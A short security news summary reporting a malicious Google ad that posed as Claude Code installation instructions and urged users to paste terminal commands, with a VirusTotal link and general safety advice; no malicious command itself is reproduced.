Malicious Google Ad Targets Claude Code Installation

Malicious Google Result for Claude Code Installation

A security researcher discovered a malicious Google ad appearing as the top result for searches related to installing Claude Code. The ad targets users searching for "install claude code" and presents suspicious terminal commands that could compromise systems.

What Happened

The author, setting up a new MacBook, searched Google for "install claude code" and clicked the first result. Without uBlock installed, they encountered an ad prompting them to copy and paste terminal commands. Recognizing something was off, they canceled the command execution before running it.

The author notes this is particularly dangerous because many users new to AI tools may have limited CLI experience and might not recognize malicious commands. The ad was still active as of March 15, 2026, at 12:17 UTC.

Security Implications

The malicious code could potentially:

• Compromise user systems
• Steal Anthropic API keys (which the author suggests might be more valuable than Bitcoin mining in some cases)
• Target inexperienced users who rely on copy-paste installation methods

The author provided a VirusTotal link for the suspicious file: https://www.virustotal.com/gui/file/853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa

Broader Context

This incident highlights the risks of relying on search engine results for software installation, especially for AI development tools. Users should verify installation sources, use ad blockers, and be cautious when executing terminal commands from unfamiliar sources.